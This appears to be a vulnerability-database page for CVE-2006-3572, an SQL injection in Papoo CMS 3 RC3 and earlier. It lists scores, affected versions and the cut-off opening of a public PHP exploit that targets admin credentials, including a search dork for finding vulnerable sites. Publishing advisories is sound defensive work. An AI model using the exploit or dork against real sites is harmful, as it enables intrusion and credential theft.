7.5
CVSSv2

CVE-2006-3572

Published: 13/07/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in forumthread.php in Papoo 3 RC3 and previous versions allows remote malicious users to execute arbitrary SQL commands via the msgid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

papoo papoo 2.1.2

papoo papoo 2.1.4

papoo papoo 2.1.5

papoo papoo 3.0.0

papoo papoo 3.0.0_beta1

papoo papoo

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "PAPOO <= 3_RC3 SQL injection / admin credentials disclosure\n"; echo "by rgod rgod@autisticiorg\n"; echo "site: retrogodaltervistaorg\n"; echo "dork: \"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"\n\n"; /* notes: works regardless of magic_quot ...